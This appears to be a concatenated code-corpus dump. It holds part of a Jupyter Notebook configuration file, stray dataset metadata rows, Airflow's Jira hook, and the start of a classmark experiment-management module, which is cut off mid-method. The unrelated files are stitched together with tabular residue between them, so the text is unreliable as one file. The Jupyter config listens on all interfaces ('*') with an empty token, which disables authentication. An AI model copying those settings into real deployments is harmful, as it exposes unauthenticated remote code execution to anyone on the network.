#c.NotebookApp.extra_template_paths = []
##
#c.NotebookApp.file_to_run = ''
## Deprecated: Use minified JS file or not; mainly used during dev to avoid JS
# recompilation
#c.NotebookApp.ignore_minified_js = False
## (bytes/sec) Maximum rate at which stream output can be sent on iopub before
# it is limited.
#c.NotebookApp.iopub_data_rate_limit = 1000000
## (msgs/sec) Maximum rate at which messages can be sent on iopub before they are
# limited.
#c.NotebookApp.iopub_msg_rate_limit = 1000
## The IP address the notebook server will listen on.
c.NotebookApp.ip = '*'
## Supply extra arguments that will be passed to Jinja environment.
#c.NotebookApp.jinja_environment_options = {}
## Extra variables to supply to jinja templates when rendering.
#c.NotebookApp.jinja_template_vars = {}
## The kernel manager class to use.
#c.NotebookApp.kernel_manager_class = 'notebook.services.kernels.kernelmanager.MappingKernelManager'
## The kernel spec manager class to use. Should be a subclass of
# jupyter_client.kernelspec.KernelSpecManager.
#
# The Api of KernelSpecManager is provisional and might change without warning
# between this version of Jupyter and the next stable one.
#c.NotebookApp.kernel_spec_manager_class = 'jupyter_client.kernelspec.KernelSpecManager'
## The full path to a private key file for usage with SSL/TLS.
#c.NotebookApp.keyfile = ''
## The login handler class to use.
#c.NotebookApp.login_handler_class = 'notebook.auth.login.LoginHandler'
## The logout handler class to use.
#c.NotebookApp.logout_handler_class = 'notebook.auth.logout.LogoutHandler'
## The MathJax.js config file that is to be used.
#c.NotebookApp.mathjax_config = 'TeX-AMS-MML_HTMLorMML-full,Safe'
## A custom url for MathJax.js. Should be in the form of a case-sensitive url to
# MathJax, for example: /static/components/MathJax/MathJax.js
#c.NotebookApp.mathjax_url = ''
## Dict of Python modules to load as notebook server extensions. Entry values can
# be used to enable and disable the loading of the extensions. The extensions
# will be loaded in alphabetical order.
#c.NotebookApp.nbserver_extensions = {}
## The directory to use for notebooks and kernels.
#c.NotebookApp.notebook_dir = ''
## Whether to open in a browser after starting. The specific browser used is
# platform dependent and determined by the python standard library webbrowser
# module, unless it is overridden using the --browser (NotebookApp.browser)
# config option.
#c.NotebookApp.open_browser = True
## Hashed password to use for web authentication.
#
# To generate, type in a python/IPython shell:
#
# from notebook.auth import passwd; passwd()
#
# The string should be of the form type:salt:hashed-password.
#c.NotebookApp.password = 'sha1:abef2102a711:d31b87c543f160b1d3f682b36e39bf7006d3688b'
## Forces users to use a password for the Notebook server. This is useful in a
# multi user environment, for instance when everybody in the LAN can access each
# other's machine through ssh.
#
# In such a case, serving the notebook server on localhost is not secure, since
# any user can connect to the notebook server via ssh.
#c.NotebookApp.password_required = False
## The port the notebook server will listen on.
#c.NotebookApp.port = 8888
## The number of additional ports to try if the specified port is not available.
#c.NotebookApp.port_retries = 50
## DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
#c.NotebookApp.pylab = 'disabled'
## If True, display a button in the dashboard to quit (shutdown the notebook
# server).
#c.NotebookApp.quit_button = True
## (sec) Time window used to check the message and data rate limits.
#c.NotebookApp.rate_limit_window = 3
## Reraise exceptions encountered loading server extensions?
#c.NotebookApp.reraise_server_extension_failures = False
## DEPRECATED use the nbserver_extensions dict instead
#c.NotebookApp.server_extensions = []
## The session manager class to use.
#c.NotebookApp.session_manager_class = 'notebook.services.sessions.sessionmanager.SessionManager'
## Shut down the server after N seconds with no kernels or terminals running and
# no activity. This can be used together with culling idle kernels
# (MappingKernelManager.cull_idle_timeout) to shutdown the notebook server when
# it's not in use. This is not precisely timed: it may shut down up to a minute
# later. 0 (the default) disables this automatic shutdown.
#c.NotebookApp.shutdown_no_activity_timeout = 0
## Supply SSL options for the tornado HTTPServer. See the tornado docs for
# details.
#c.NotebookApp.ssl_options = {}
## Supply overrides for terminado. Currently only supports "shell_command".
#c.NotebookApp.terminado_settings = {}
## Set to False to disable terminals.
#
# This does *not* make the notebook server more secure by itself. Anything the
# user can do in a terminal, they can also do in a notebook.
#
# Terminals may also be automatically disabled if the terminado package is not
# available.
#c.NotebookApp.terminals_enabled = True
## Token used for authenticating first-time connections to the server.
#
# When no password is enabled, the default is to generate a new, random token.
#
# Setting to an empty string disables authentication altogether, which is NOT
# RECOMMENDED.
#
c.NotebookApp.token = u''
## Supply overrides for the tornado.web.Application that the Jupyter notebook
# uses.
#c.NotebookApp.tornado_settings = {}
## Whether or not to trust X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-
# For headers sent by the upstream reverse proxy. Necessary if the proxy handles
# SSL.
#c.NotebookApp.trust_xheaders = False
## DEPRECATED, use tornado_settings
#c.NotebookApp.webapp_settings = {}
## Specify where to open the notebook on startup. This is the 'new' argument
# passed to the standard library method webbrowser.open. The behaviour is not
# guaranteed, but depends on browser support. Valid values are:
#
# - 2 opens a new tab,
# - 1 opens a new window,
# - 0 opens in an existing window.
#
# See the webbrowser.open documentation for details.
#c.NotebookApp.webbrowser_open_new = 2
## Set the tornado compression options for websocket connections.
#
# This value will be returned from
# :meth:WebSocketHandler.get_compression_options. None (default) will disable
# compression. A dict (even an empty one) will enable compression.
#
# See the tornado docs for WebSocketHandler.get_compression_options for details.
#c.NotebookApp.websocket_compression_options = None
## The base URL for websockets, if it differs from the HTTP server (hint: it
# almost certainly doesn't).
#
# Should be in the form of an HTTP origin: ws[s]://hostname[:port]
#c.NotebookApp.websocket_url = ''
#------------------------------------------------------------------------------
# ConnectionFileMixin(LoggingConfigurable) config
#------------------------------------------------------------------------------
## Mixin for configurable classes that work with connection files
## JSON file in which to store connection info [default: kernel-<pid>.json]
#
# This file will contain the IP, ports, and authentication key needed to connect
# clients to this kernel. By default, this file will be created in the security
# dir of the current profile, but can be specified by absolute path.
#c.ConnectionFileMixin.connection_file = ''
## set the control (ROUTER) port [default: random]
#c.ConnectionFileMixin.control_port = 0
## set the heartbeat port [default: random]
#c.ConnectionFileMixin.hb_port = 0
## set the iopub (PUB) port [default: random]
#c.ConnectionFileMixin.iopub_port = 0
## Set the kernel's IP address [default localhost]. If the IP address is
# something other than localhost, then Consoles on other machines will be able
# to connect to the Kernel, so be careful!
#c.ConnectionFileMixin.ip = ''
## set the shell (ROUTER) port [default: random]
#c.ConnectionFileMixin.shell_port = 0
## set the stdin (ROUTER) port [default: random]
#c.ConnectionFileMixin.stdin_port = 0
##
#c.ConnectionFileMixin.transport = 'tcp'
#------------------------------------------------------------------------------
# KernelManager(ConnectionFileMixin) config
#------------------------------------------------------------------------------
## Manages a single kernel in a subprocess on this host.
#
# This version starts kernels with Popen.
## Should we autorestart the kernel if it dies.
#c.KernelManager.autorestart = True
## DEPRECATED: Use kernel_name instead.
#
# The Popen Command to launch the kernel. Override this if you have a custom
# kernel. If kernel_cmd is specified in a config file, Jupyter does not
# pass any arguments to the kernel, because it cannot make any assumptions about
# the arguments that the kernel understands. In particular, this means that the
# kernel does not receive the option --debug if it is given on the Jupyter command
# line.
#c.KernelManager.kernel_cmd = []
## Time to wait for a kernel to terminate before killing it, in seconds.
#c.KernelManager.shutdown_wait_time = 5.0
#------------------------------------------------------------------------------
# Session(Configurable) config
#------------------------------------------------------------------------------
## Object for handling serialization and sending of messages.
#
# The Session object handles building messages and sending them with ZMQ sockets
# or ZMQStream objects. Objects can communicate with each other over the
# network via Session objects, and only need to work with the dict-based IPython
# message spec. The Session will handle serialization/deserialization, security,
# and metadata.
#
# Sessions support configurable serialization via packer/unpacker traits, and
# signing with HMAC digests via the key/keyfile traits.
#
# Parameters
# ----------
#
# debug : bool
# whether to trigger extra debugging statements
# packer/unpacker : str : 'json', 'pickle' or import_string
# importstrings for methods to serialize message parts. If just
# 'json' or 'pickle', predefined JSON and pickle packers will be used.
# Otherwise, the entire importstring must be used.
#
# The functions must accept at least valid JSON input, and output *bytes*.
#
# For example, to use msgpack:
# packer = 'msgpack.packb', unpacker='msgpack.unpackb'
# pack/unpack : callables
# You can also set the pack/unpack callables for serialization directly.
# session : bytes
# the ID of this Session object. The default is to generate a new UUID.
# username : unicode
# username added to message headers. The default is to ask the OS.
# key : bytes
# The key used to initialize an HMAC signature. If unset, messages
# will not be signed or checked.
# keyfile : filepath
# The file containing a key. If this is set, key will be initialized
# to the contents of the file.
## Threshold (in bytes) beyond which an object's buffer should be extracted to
# avoid pickling.
#c.Session.buffer_threshold = 1024
## Whether to check PID to protect against calls after fork.
#
# This check can be disabled if fork-safety is handled elsewhere.
#c.Session.check_pid = True
## Threshold (in bytes) beyond which a buffer should be sent without copying.
#c.Session.copy_threshold = 65536
## Debug output in the Session
#c.Session.debug = False
## The maximum number of digests to remember.
#
# The digest history will be culled when it exceeds this value.
#c.Session.digest_history_size = 65536
## The maximum number of items for a container to be introspected for custom
# serialization. Containers larger than this are pickled outright.
#c.Session.item_threshold = 64
## execution key, for signing messages.
#c.Session.key = b''
## path to file containing execution key.
#c.Session.keyfile = ''
## Metadata dictionary, which serves as the default top-level metadata dict for
# each message.
#c.Session.metadata = {}
## The name of the packer for serializing messages. Should be one of 'json',
# 'pickle', or an import name for a custom callable serializer.
#c.Session.packer = 'json'
## The UUID identifying this session.
#c.Session.session = ''
## The digest scheme used to construct the message signatures. Must have the form
# 'hmac-HASH'.
#c.Session.signature_scheme = 'hmac-sha256'
## The name of the unpacker for unserializing messages. Only used with custom
# functions for packer.
#c.Session.unpacker = 'json'
## Username for the Session. Default is your system username.
#c.Session.username = 'username'
#------------------------------------------------------------------------------
# MultiKernelManager(LoggingConfigurable) config
#------------------------------------------------------------------------------
## A class for managing multiple kernels.
## The name of the default kernel to start
#c.MultiKernelManager.default_kernel_name = 'python3'
## The kernel manager class. This is configurable to allow subclassing of the
# KernelManager for customized behavior.
#c.MultiKernelManager.kernel_manager_class = 'jupyter_client.ioloop.IOLoopKernelManager'
#------------------------------------------------------------------------------
# MappingKernelManager(MultiKernelManager) config
#------------------------------------------------------------------------------
## A KernelManager that handles notebook mapping and HTTP error handling
## Whether messages from kernels whose frontends have disconnected should be
# buffered in-memory.
#
# When True (default), messages are buffered and replayed on reconnect, avoiding
# lost messages due to interrupted connectivity.
#
# Disable if long-running kernels will produce too much output while no
# frontends are connected.
#c.MappingKernelManager.buffer_offline_messages = True
## Whether to consider culling kernels which are busy. Only effective if
# cull_idle_timeout > 0.
#c.MappingKernelManager.cull_busy = False
## Whether to consider culling kernels which have one or more connections. Only
# effective if cull_idle_timeout > 0.
#c.MappingKernelManager.cull_connected = False
## Timeout (in seconds) after which a kernel is considered idle and ready to be
# culled. Values of 0 or lower disable culling. Very short timeouts may result
# in kernels being culled for users with poor network connections.
#c.MappingKernelManager.cull_idle_timeout = 0
## The interval (in seconds) on which to check for idle kernels exceeding the
# cull timeout value.
#c.MappingKernelManager.cull_interval = 300
##
#c.MappingKernelManager.root_dir = ''
#------------------------------------------------------------------------------
# ContentsManager(LoggingConfigurable) config
#------------------------------------------------------------------------------
## Base class for serving files and directories.
#
# This serves any text or binary file, as well as directories, with special
# handling for JSON notebook documents.
#
# Most APIs take a path argument, which is always an API-style unicode path, and
# always refers to a directory.
#
# - unicode, not url-escaped
# - '/'-separated
# - leading and trailing '/' will be stripped
# - if unspecified, path defaults to '',
# indicating the root path.
## Allow access to hidden files
#c.ContentsManager.allow_hidden = False
##
#c.ContentsManager.checkpoints = None
##
#c.ContentsManager.checkpoints_class = 'notebook.services.contents.checkpoints.Checkpoints'
##
#c.ContentsManager.checkpoints_kwargs = {}
## handler class to use when serving raw file requests.
#
# Default is a fallback that talks to the ContentsManager API, which may be
# inefficient, especially for large files.
#
# Local files-based ContentsManagers can use a StaticFileHandler subclass, which
# will be much more efficient.
#
# Access to these files should be Authenticated.
#c.ContentsManager.files_handler_class = 'notebook.files.handlers.FilesHandler'
## Extra parameters to pass to files_handler_class.
#
# For example, StaticFileHandlers generally expect a path argument specifying
# the root directory from which to serve files.
#c.ContentsManager.files_handler_params = {}
## Glob patterns to hide in file and directory listings.
#c.ContentsManager.hide_globs = ['__pycache__', '*.pyc', '*.pyo', '.DS_Store', '*.so', '*.dylib', '*~']
## Python callable or importstring thereof
#
# To be called on a contents model prior to save.
#
# This can be used to process the structure, such as removing notebook outputs
# or other side effects that should not be saved.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(path=path, model=model, contents_manager=self)
#
# - model: the model to be saved. Includes file contents.
# Modifying this dict will affect the file that is stored.
# - path: the API path of the save destination
# - contents_manager: this ContentsManager instance
#c.ContentsManager.pre_save_hook = None
##
#c.ContentsManager.root_dir = '/'
## The base name used when creating untitled directories.
#c.ContentsManager.untitled_directory = 'Untitled Folder'
## The base name used when creating untitled files.
#c.ContentsManager.untitled_file = 'untitled'
## The base name used when creating untitled notebooks.
#c.ContentsManager.untitled_notebook = 'Untitled'
#------------------------------------------------------------------------------
# FileManagerMixin(Configurable) config
#------------------------------------------------------------------------------
## Mixin for ContentsAPI classes that interact with the filesystem.
#
# Provides facilities for reading, writing, and copying both notebooks and
# generic files.
#
# Shared by FileContentsManager and FileCheckpoints.
#
# Note ---- Classes using this mixin must provide the following attributes:
#
# root_dir : unicode
#     A directory against which API-style paths are to be resolved.
#
# log : logging.Logger
## By default notebooks are saved on disk to a temporary file and then, if
# successfully written, it replaces the old one. This procedure, namely
# 'atomic_writing', causes some bugs on file systems without operation-order
# enforcement (like some networked filesystems). If set to False, the new
# notebook is written directly over the old one, which could fail (e.g. full
# filesystem or quota).
#c.FileManagerMixin.use_atomic_writing = True
#------------------------------------------------------------------------------
# FileContentsManager(FileManagerMixin,ContentsManager) config
#------------------------------------------------------------------------------
## If True (default), deleting files will send them to the platform's
# trash/recycle bin, where they can be recovered. If False, deleting files
# really deletes them.
#c.FileContentsManager.delete_to_trash = True
## Python callable or importstring thereof
#
# to be called on the path of a file just saved.
#
# This can be used to process the file on disk, such as converting the notebook
# to a script or HTML via nbconvert.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(os_path=os_path, model=model, contents_manager=instance)
#
# - path: the filesystem path to the file just written
# - model: the model representing the file
# - contents_manager: this ContentsManager instance
#c.FileContentsManager.post_save_hook = None
##
#c.FileContentsManager.root_dir = ''
## DEPRECATED, use post_save_hook. Will be removed in Notebook 5.0
#c.FileContentsManager.save_script = False
#------------------------------------------------------------------------------
# NotebookNotary(LoggingConfigurable) config
#------------------------------------------------------------------------------
## A class for computing and verifying notebook signatures.
## The hashing algorithm used to sign notebooks.
#c.NotebookNotary.algorithm = 'sha256'
## The sqlite file in which to store notebook signatures. By default, this will
# be in your Jupyter data directory. You can set it to ':memory:' to disable
# sqlite writing to the filesystem.
#c.NotebookNotary.db_file = ''
## The secret key with which notebooks are signed.
#c.NotebookNotary.secret = b''
## The file where the secret key is stored.
#c.NotebookNotary.secret_file = ''
## A callable returning the storage backend for notebook signatures. The default
# uses an SQLite database.
#c.NotebookNotary.store_factory = traitlets.Undefined
#------------------------------------------------------------------------------
# KernelSpecManager(LoggingConfigurable) config
#------------------------------------------------------------------------------
## If there is no Python kernelspec registered and the IPython kernel is
# available, ensure it is added to the spec list.
#c.KernelSpecManager.ensure_native_kernel = True
## The kernel spec class. This is configurable to allow subclassing of the
# KernelSpecManager for customized behavior.
#c.KernelSpecManager.kernel_spec_class = 'jupyter_client.kernelspec.KernelSpec'
## Whitelist of allowed kernel names.
#
# By default, all installed kernels are allowed.
#c.KernelSpecManager.whitelist = set()
| 37.366848
| 103
| 0.698749
|
4ce04f69fd10c192edb2cb166d7fa47335b25558
| 3,452
|
py
|
Python
|
airflow/contrib/hooks/jira_hook.py
|
shuva10v/airflow
|
a6daeb544e815fe350a96d24ae3bb14aee4079a7
|
[
"Apache-2.0"
] | 3
|
2019-10-03T21:38:59.000Z
|
2019-10-04T00:39:03.000Z
|
airflow/contrib/hooks/jira_hook.py
|
shuva10v/airflow
|
a6daeb544e815fe350a96d24ae3bb14aee4079a7
|
[
"Apache-2.0"
] | 7
|
2019-03-27T07:58:14.000Z
|
2020-02-12T17:42:33.000Z
|
airflow/contrib/hooks/jira_hook.py
|
upjohnc/airflow-upjohn-k8s
|
caadbc1618d73e054de99138b0892cea3a9327c4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 5
|
2017-06-19T19:55:47.000Z
|
2020-10-10T00:49:20.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from jira import JIRA
from jira.exceptions import JIRAError
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
class JiraHook(BaseHook):
"""
    Jira interaction hook, a wrapper around the JIRA Python SDK.
:param jira_conn_id: reference to a pre-defined Jira Connection
:type jira_conn_id: str
"""
def __init__(self,
jira_conn_id='jira_default',
proxies=None):
super().__init__(jira_conn_id)
self.jira_conn_id = jira_conn_id
self.proxies = proxies
self.client = None
self.get_conn()
def get_conn(self):
if not self.client:
self.log.debug('Creating Jira client for conn_id: %s', self.jira_conn_id)
get_server_info = True
validate = True
extra_options = {}
conn = None
if self.jira_conn_id is not None:
conn = self.get_connection(self.jira_conn_id)
if conn.extra is not None:
extra_options = conn.extra_dejson
# only required attributes are taken for now,
                # more can be added, e.g. async, logging, max_retries
# verify
if 'verify' in extra_options \
and extra_options['verify'].lower() == 'false':
extra_options['verify'] = False
# validate
if 'validate' in extra_options \
and extra_options['validate'].lower() == 'false':
validate = False
if 'get_server_info' in extra_options \
and extra_options['get_server_info'].lower() == 'false':
get_server_info = False
try:
self.client = JIRA(conn.host,
options=extra_options,
basic_auth=(conn.login, conn.password),
get_server_info=get_server_info,
validate=validate,
proxies=self.proxies)
except JIRAError as jira_error:
raise AirflowException('Failed to create jira client, jira error: %s'
% str(jira_error))
except Exception as e:
raise AirflowException('Failed to create jira client, error: %s'
% str(e))
return self.client
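# Example usage (illustrative; assumes an Airflow connection 'jira_default'
# with host, login and password configured):
#   hook = JiraHook(jira_conn_id='jira_default')
#   client = hook.get_conn()
#   issue = client.issue('PROJ-123')  # 'PROJ-123' is a hypothetical issue key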
| 39.678161
| 89
| 0.563731
|
68f7e758bfc86f1e75721484f5ab66b6d7a45f57
| 42,995
|
py
|
Python
|
classmark/core/experiment.py
|
windionleaf/ClassMark
|
e6019f9abeb99e9a6b72365a508d5a6dac13c3c7
|
[
"Unlicense"
] | null | null | null |
classmark/core/experiment.py
|
windionleaf/ClassMark
|
e6019f9abeb99e9a6b72365a508d5a6dac13c3c7
|
[
"Unlicense"
] | 2
|
2020-09-26T00:56:27.000Z
|
2020-11-13T18:47:16.000Z
|
classmark/core/experiment.py
|
windionleaf/ClassMark
|
e6019f9abeb99e9a6b72365a508d5a6dac13c3c7
|
[
"Unlicense"
] | null | null | null |
"""
Created on 18. 2. 2019
Module for experiment representation and actions.
:author: Martin Dočekal
:contact: xdocek09@stud.fit.vubtr.cz
"""
from ..data.data_set import DataSet
from enum import Enum, auto
import time
from _collections import OrderedDict
from ..core.plugins import Plugin, CLASSIFIERS, FEATURE_EXTRACTORS
from ..core.validation import Validator
from PySide2.QtCore import QThread, Signal
from .results import Results
from typing import Any, Dict, List
import numpy as np
import pandas as pd
from sklearn.metrics import classification_report, accuracy_score
import multiprocessing
import queue
import copy
import statistics
from functools import partial
from .utils import getAllSubclasses, sparseMatVariance, Observable, Logger, Singleton
from .selection import FeaturesSelector
import pickle
from classmark.core.plugins import Classifier
from sklearn.preprocessing import LabelEncoder
import traceback
import os
class LastUsedExperiments(Observable, metaclass=Singleton):
"""
Last used experiments manager. (singleton)
"""
DATA_FILE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "data", "lastUsed")
MAX_IN_HISTORY = 100
def __init__(self):
"""
Initialization of singleton instance
"""
super().__init__()
self._list = []
if os.path.exists(self.DATA_FILE_PATH):
with open(self.DATA_FILE_PATH, "r+") as file:
filtered = False
for line in file:
p = line.rstrip('\n')
if os.path.exists(p):
self._list.append(p)
else:
# filtered
filtered = True
if filtered:
# write changes
self._listChange()
@property
def list(self):
"""
Get list of last used experiments.
"""
return self._list
def _listChange(self):
"""
Update list content in file.
"""
with open(self.DATA_FILE_PATH, "w") as f:
for p in self._list:
print(p, file=f)
@Observable._event("CHANGE")
def used(self, pathToExp: str):
"""
Inform that experiment on given path was used.
:param pathToExp: Path of given experiment.
:type pathToExp: str
"""
try:
self._list.insert(0, self._list.pop(self._list.index(pathToExp)))
except ValueError:
# not in list yet
self._list.insert(0, pathToExp)
if len(self._list) > self.MAX_IN_HISTORY:
del self._list[-1]
# list changed
self._listChange()
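    # Illustrative behaviour (path hypothetical):
    #   LastUsedExperiments().used('/tmp/demo.exp')
    #   LastUsedExperiments().list[0]  # -> '/tmp/demo.exp' (most recent first)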
class PluginSlot(object):
"""
    Slot that stores information about the selected plugin.
"""
def __init__(self, slotID):
"""
Creates empty classifier slot
:param slotID: Unique identifier of slot.
:type slotID: int
"""
self._id = slotID
self.plugin = None
@property
def id(self):
"""
Slot id.
:return: id
:rtype: int
"""
return self._id
def __eq__(self, other):
if not isinstance(other, __class__):
return False
return self._id == other._id
def __hash__(self):
return self._id
class ExperimentDataStatistics(Observable):
"""
Data statistics of experiment.
"""
def __init__(self):
super().__init__()
self._classSamples = {}
self._classActivity = {}
self._classes = [] # just to give order to the classes
self._attributes = []
self._attributesFeatures = {}
self._attributesAVGFeatureSD = {}
def isActive(self, c):
"""
Determines if given class is active.
:param c: Class for check.
:type c: Any
:return: True active. False otherwise.
:rtype: bool
"""
return self._classActivity[c]
@Observable._event("SAMPLES_CHANGED")
def samplesChangeEvent(self):
"""
Informs all observers that samples stats changed.
        This method should be called from inside this class only; for other
        classes it exists just for observing.
"""
pass
def deactivateClass(self, c):
"""
        Deactivating a class means that this class is hidden and is no longer
        reflected in properties like classes, classSamples, numberOfSamples,
        maxSamplesInClass and minSamplesInClass.
:param c: Class from classes.
:type c: Any
"""
self._classActivity[c] = False
self.samplesChangeEvent()
def activateClass(self, c):
"""
Activate class c.
:param c: Class from classes.
:type c: Any
"""
self._classActivity[c] = True
self.samplesChangeEvent()
@property
def attributes(self):
"""
All attributes we have stats for.
:return: List of attributes.
:rtype: List[str]
"""
return self._attributes
@attributes.setter
def attributes(self, attr):
"""
Set all attributes. Is used mainly for the order of these attributes.
        WARNING: Clears the attribute metrics.
:param attr: List of attributes.
:type attr: List[str]
"""
self._attributesFeatures = {}
self._attributesAVGFeatureSD = {}
for a in attr:
self._attributesFeatures[a] = 0
self._attributesAVGFeatureSD[a] = 0
self._attributes = attr
@property
def classes(self):
"""
Gives list of all classes.
:return: classes
:rtype: List[Any]
"""
return self._classes
@property
def activeClasses(self):
"""
Gives list of only active classes.
:return: active classes
:rtype: List[Any]
"""
return [c for c in self._classes if self._classActivity[c]]
@property
def classSamples(self):
"""
        Number of samples per class in the form of a dict where the key is the
        class and the value is the number of samples.
"""
return {c: self._classSamples[c] for c in self.activeClasses}
@classSamples.setter
def classSamples(self, newCS: Dict[Any, int]):
"""
Set new class samples.
:param newCS: New number of samples per class.
:type newCS: Dict[Any, int]
"""
self._classSamples = newCS
self._classActivity = {c: True for c in newCS}
self._classes = list(newCS.keys())
self.samplesChangeEvent()
def changeSamplesInClass(self, c, n):
"""
Changes number of samples per class.
:param c: The class.
:type c: Any
:param n: New number of samples in class.
:type n: int
"""
self._classSamples[c] = n
self.samplesChangeEvent()
@property
def numberOfSamples(self):
"""
Number of samples in whole data set.
Is calculated from classSamples.
"""
return sum(self._classSamples[c] for c in self.activeClasses)
@property
def maxSamplesInClass(self):
"""
Gives maximal number of samples in class and also returns the class itself.
:return: maximal number of samples in class and that class
:rtype: Tuple[int, Any]
"""
if len(self.activeClasses) > 0:
mC = max(self.activeClasses, key=lambda x: self._classSamples[x])
return (self._classSamples[mC], mC)
return (0, "")
@property
def minSamplesInClass(self):
"""
Gives minimal number of samples in class and also returns the class itself.
:return: minimal number of samples in class and that class
:rtype: Tuple[int, Any]
"""
if len(self.activeClasses) > 0:
mC = min(self.activeClasses, key=lambda x: self._classSamples[x])
return (self._classSamples[mC], mC)
return (0, "")
@property
def AVGSamplesInClass(self):
"""
Average number of samples in class.
:return: avg samples
:rtype: float
"""
if len(self.activeClasses) > 0:
return sum(self._classSamples[c] for c in self.activeClasses) / len(self.activeClasses)
return 0
@property
def SDSamplesInClass(self):
"""
Standard deviation of number of class samples.
:return: SD of number of class samples
:rtype: float
"""
if len(self.activeClasses) > 1:
return statistics.stdev(self._classSamples[c] for c in self.activeClasses)
return 0
@property
def attributesFeatures(self):
"""
Number of features for every attribute.
"""
return self._attributesFeatures
@property
def attributesAVGFeatureSD(self):
"""
Average standard deviation of features for each attribute.
"""
return self._attributesAVGFeatureSD
class ExperimentLoadException(Exception):
"""
There are some troubles when we are loading experiment.
"""
pass
class Experiment(Observable):
"""
This class represents experiment.
"""
DEFAULT_FEATURE_EXTRACTOR_NAME = "Pass"
"""Name of default feature extractor that is set to attribute.
If exists."""
class AttributeSettings(Enum):
"""
Possible settings types that could be set to an attribute.
"""
USE = 0
PATH = 1
FEATURE_EXTRACTOR = 2
LABEL = 3
def __init__(self, filePath: str = None):
"""
Creation of new experiment or loading of saved.
        :param filePath: Path to file. If None, a new experiment is created;
            otherwise the saved experiment is loaded.
        :type filePath: str | None
:raise RuntimeError: When there is a problem with plugins.
:raise ExperimentLoadException: When there is a problem with loading.
"""
super().__init__()
self._dataset = None
self._attributesSet = {}
self._label = None
self._featuresSele = []
self._classifiers = [] # classifiers for testing
self._evaluationMethod = None
        self.loadSavePath = None  # stores the path from which this experiment was loaded or where it is saved
self.results = None
# let's load the plugins that are now available
# must be called before experiment loading
# because sets default values
self._loadPlugins()
if filePath is not None:
# load saved experiment
self._load(filePath)
self.loadSavePath = filePath
self._dataStats = None
self._origDataStats = None
self._attributesThatShouldBeUsedCache = {}
def save(self, filePath):
"""
Saves experiment configuration to given file.
:param filePath: Path to experiment file.
:type filePath: str
"""
with open(filePath, "wb") as saveF:
# let's create Experiment version for saving
data = {
"dataSet": self._dataset,
"attributesSet": self._attributesSet,
"label": self._label,
"featuresSele": self._featuresSele,
"classifiers": self._classifiers,
"evaluationMethod": self._evaluationMethod,
"results": self.results
}
# save it
pickle.dump(data, saveF)
self.loadSavePath = filePath
LastUsedExperiments().used(filePath)
def setResults(self, r):
"""
Sets results. Suitable for use as callback.
:param r: new results.
:type r: Results
"""
self.results = r
def _load(self, filePath):
"""
Loads saved experiment configuration from given file.
:param filePath: Path to experiment file.
:type filePath: str
:raise ExperimentLoadException: When there is a problem with loading.
"""
with open(filePath, "rb") as loadF:
try:
lE = pickle.load(loadF)
except:
raise ExperimentLoadException("Couldn't load given experiment.")
if not isinstance(lE, dict):
raise ExperimentLoadException("Couldn't load given experiment.")
# check that we have loaded all attributes
for a in ["dataSet", "attributesSet", "label", \
"featuresSele", "classifiers", "evaluationMethod"]:
if a not in lE:
raise ExperimentLoadException("Couldn't load given experiment.")
if not isinstance(lE["dataSet"], DataSet):
raise ExperimentLoadException("Couldn't load given experiment.")
self._dataset = lE["dataSet"]
if not isinstance(lE["attributesSet"], dict):
raise ExperimentLoadException("Couldn't load given experiment.")
self._attributesSet = lE["attributesSet"]
if not isinstance(lE["label"], str) and lE["label"] is not None:
raise ExperimentLoadException("Couldn't load given experiment.")
self._label = lE["label"]
if not isinstance(lE["featuresSele"], list) and \
any(not isinstance(fs, FeaturesSelector) for fs in lE["featuresSele"]):
raise ExperimentLoadException("Couldn't load given experiment.")
self._featuresSele = lE["featuresSele"]
if not isinstance(lE["classifiers"], list) and \
any(not isinstance(c, Classifier) for c in lE["classifiers"]):
raise ExperimentLoadException("Couldn't load given experiment.")
self._classifiers = lE["classifiers"]
if not isinstance(lE["evaluationMethod"], Validator):
raise ExperimentLoadException("Couldn't load given experiment.")
self._evaluationMethod = lE["evaluationMethod"]
if lE["results"] is not None and not isinstance(lE["results"], Results):
raise ExperimentLoadException("Couldn't load given experiment.")
self.results = lE["results"]
LastUsedExperiments().used(filePath)
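# A minimal usage sketch of the save/load round-trip above (file names are
# hypothetical; loadDataset is defined later in this class):
#
#     exp = Experiment()                             # new, empty experiment
#     exp.loadDataset("data.csv")                    # configure it
#     exp.save("my_experiment.pickle")               # pickle the configuration
#     restored = Experiment("my_experiment.pickle")  # raises ExperimentLoadException on failure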
def useDataSubset(self):
"""
Use only defined subset of data.
Subset is defined by selected samples.
Samples are selected according to constraints defined in dataStats.
"""
self._dataset.useSubset(None) # clear the old one
if self._dataStats is not None:
subset = np.empty(self._dataStats.numberOfSamples)
counters = copy.copy(self._dataStats.classSamples)
cnt = 0
for i, sample in enumerate(self._dataset):
l = sample[self._label]
try:
if counters[l] > 0:
counters[l] -= 1
subset[cnt] = i
cnt += 1
except KeyError:
# probably class that we want to omit
pass
self.dataset.useSubset(subset)
@property
def dataStats(self):
"""
The data stats. Working copy of original data stats.
:return: Actual stats.
:rtype: ExperimentDataStatistics | None
"""
return self._dataStats
@property
def origDataStats(self):
"""
Original data stats. You are probably looking for the working copy
of the data stats, which you can get with dataStats.
:return: Original data stats.
:rtype: ExperimentDataStatistics | None
"""
return self._origDataStats
@Observable._event("NEW_DATA_STATS")
def setDataStats(self, stats, actOnly=False):
"""
Set the data stats. This method overrides working copy
and original data stats.
:param stats: New stats.
:type stats: ExperimentDataStatistics
:param actOnly: If True, only the working copy is overridden.
If False, the original data is overridden too.
If no original data was set (origData is None), this
parameter is ignored and origData is set as well.
:type actOnly: bool
"""
